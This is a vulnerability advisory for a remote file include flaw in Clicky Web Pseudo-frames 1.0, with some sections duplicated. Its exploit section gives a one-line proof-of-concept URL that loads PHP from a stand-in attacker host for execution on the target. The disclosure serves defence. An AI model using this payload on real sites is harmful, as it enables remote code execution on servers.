Clicky Web Pseudo-frames Remote File Include Vulnerability
BID:4756
Info
Clicky Web Pseudo-frames Remote File Include Vulnerability
| Bugtraq ID: | 4756 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 12 2002 12:00AM |
| Updated: | May 12 2002 12:00AM |
| Credit: | Discovered by frog frog <[email protected]>. |
| Vulnerable: |
Clicky Web Pseudo-frames 1.0 |
| Not Vulnerable: | |
Discussion
Clicky Web Pseudo-frames Remote File Include Vulnerability
Pseudo-frames is an application written in PHP and is maintained by Clicky Web.
Pseudo-frames permit remote file including. As a result, a remote attacker may include an arbitrary file located on a remote host. If this file is a PHP script, it will be executed on the host running the vulnerable software.
Pseudo-frames is an application written in PHP and is maintained by Clicky Web.
Pseudo-frames permit remote file including. As a result, a remote attacker may include an arbitrary file located on a remote host. If this file is a PHP script, it will be executed on the host running the vulnerable software.
Exploit / POC
Clicky Web Pseudo-frames Remote File Include Vulnerability
frog frog <[email protected]> has provided the following example:
http://www.site.com/index.php?page=http://www.haxor.com/file
frog frog <[email protected]> has provided the following example:
http://www.site.com/index.php?page=http://www.haxor.com/file
Solution / Fix
Clicky Web Pseudo-frames Remote File Include Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Clicky Web Pseudo-frames Remote File Include Vulnerability
References:
References:
- Pseudo-frames Homepage (Clicky Web)
- Security holes : Pseudo-Frame, PG, KvPoll, Phorum, BanMat (frog frog
)